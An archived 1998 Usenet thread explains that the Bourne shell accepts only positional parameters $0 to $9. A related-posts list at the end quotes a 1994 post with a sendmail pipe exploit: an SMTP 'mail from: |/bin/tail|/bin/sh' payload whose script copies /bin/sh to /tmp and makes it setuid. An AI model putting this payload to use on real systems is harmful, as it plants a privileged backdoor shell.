bug / feature in /bin/sh ?

bug / feature in /bin/sh ?

Post by Philip Armstro » Thu, 30 Apr 1998 04:00:00



We seem to have run across a bug in /bin/sh :

If you are passing more than 9 command line variables to a shell script,
then you need to quote the variable number inside a pair of braces : ${10},
otherise you'll get the variable $1 followed by the number 0 ...

Unfortunately, this fails with the error "bad substitution" if the
variable inside the quotes is a number with more than one
digit. Single digits, eg ${8} work fine, as do variables with ordinary names:

#!/bin/sh
TESTING=hello
echo $1 $2 $3 $4 $5 $6 $7 $8 ${9} ${TESTING}

when invoked gives:

$> testing.sh a b c d e f g h i j k
a b c d e d e f g h i hello

whereas

#!/bin/sh
TESTING=hello
echo $1 $2 $3 $4 $5 $6 $7 $8 ${9} ${10} ${TESTING}  

gives:

$ testing.sh a b c d e f g h i j k
testing.sh: bad substitution

Of course, this could be a 'feature' of /bin/sh -- you might only be able
to refer to variables $0-9...does anybody know whether this is the case?
It certainly seems a bit dumb if so. All the other shells I've tried are
quite happy with ${10} and its ilk...

any advice appreciated...

cheers,

Phil Armstrong
--
no sig

 
 
 

bug / feature in /bin/sh ?

Post by Patrick M. Hause » Thu, 30 Apr 1998 04:00:00



> We seem to have run across a bug in /bin/sh :
> If you are passing more than 9 command line variables to a shell script,
> then you need to quote the variable number inside a pair of braces : ${10},
> otherise you'll get the variable $1 followed by the number 0 ...
> Unfortunately, this fails with the error "bad substitution" if the
> variable inside the quotes is a number with more than one
> digit. Single digits, eg ${8} work fine, as do variables with ordinary names:
> #!/bin/sh
> TESTING=hello
> echo $1 $2 $3 $4 $5 $6 $7 $8 ${9} ${TESTING}
> when invoked gives:
> $> testing.sh a b c d e f g h i j k
> a b c d e d e f g h i hello
> whereas
> #!/bin/sh
> TESTING=hello
> echo $1 $2 $3 $4 $5 $6 $7 $8 ${9} ${10} ${TESTING}  
> gives:
> $ testing.sh a b c d e f g h i j k
> testing.sh: bad substitution
> Of course, this could be a 'feature' of /bin/sh -- you might only be able
> to refer to variables $0-9...does anybody know whether this is the case?
> It certainly seems a bit dumb if so. All the other shells I've tried are
> quite happy with ${10} and its ilk...

This is indeed the case. The Bourne shell supports only $0-$9.
All other shells are extensions of the Bourne shell, that are never
guaranteed to be portable.
Use the Korn shell (ksh) and give up portability or use "shift".

Patrick

 
 
 

bug / feature in /bin/sh ?

Post by Philip Armstro » Thu, 30 Apr 1998 04:00:00





[snip]
>> Of course, this could be a 'feature' of /bin/sh -- you might only be able
>> to refer to variables $0-9...does anybody know whether this is the case?
>> It certainly seems a bit dumb if so. All the other shells I've tried are
>> quite happy with ${10} and its ilk...

>This is indeed the case. The Bourne shell supports only $0-$9.
>All other shells are extensions of the Bourne shell, that are never
>guaranteed to be portable.
>Use the Korn shell (ksh) and give up portability or use "shift".

joy. Oh well - I presume I'm not the only one that regards this as a dumb
piece of programming :-)

thanks for the response (and to those who mailed me..)

cheers all,

Phil

--
no sig

 
 
 

1. Q: Sendmail Bug using From: |/bin/tail|/bin/sh

We have sendmail 5.0 installed on System V Release 4.0.
I tried to exploit the sendmail bug but no luck. I tried :

helo
mail from: |/bin/tail|/bin/sh
rcpt to: fred  (thats me)
data


Return-Receipt-To: |fooooobar
Subject: Checking our mail for vulnerabilities

hello.

#!/bin/sh
echo This is a test > /tmp/b1
echo id is: >> /tmp/b1
/bin/id >> /tmp/b1
echo *****KRAD****** >> /tmp/b1
cp /bin/sh /tmp/afil3
chmod u+s /tmp/afil3
echo /tmp/afil3 contains a krad file >> /tmp/b1
chmod ugo+rx /tmp/afil3

Now what happens is that I get the message returned to me with:

Message  2:
From |/bin/tail|/bin/sh Tue Nov 15 18:18 GMT 1994
Date: Tue, 15 Nov 1994 18:14:00 +0000

as the header... why have I got it back? I think the mail program should
have executed the program I put.. so why didn't it create the shell?
Any Input would be greatly apprectiated... e-mail your response if you know
how to get it working... thanks.

2. Gateway P5-90 and RedHat 6.1

3. #!/bin/sh #!/usr/bin/sh can I do both for 2 diff machines

4. Can I know all opened file in unixsystem ?

5. more secure?: "#!/bin/sh -" or "#!/bin/sh"

6. DLT unit on Solaris 2.6?

7. sh -c behavior. bug or feature?

8. Files >2Gb on Linux/alpha?

9. /bin/login and rlogind bug/feature and fix, comments please

10. sh feature: redirection of flow control bug

11. SVR4 /bin/sh BUG

12. HP-UX /bin/sh bug?

13. Q: Bug in /bin/sh of SunOS 4.1.x ?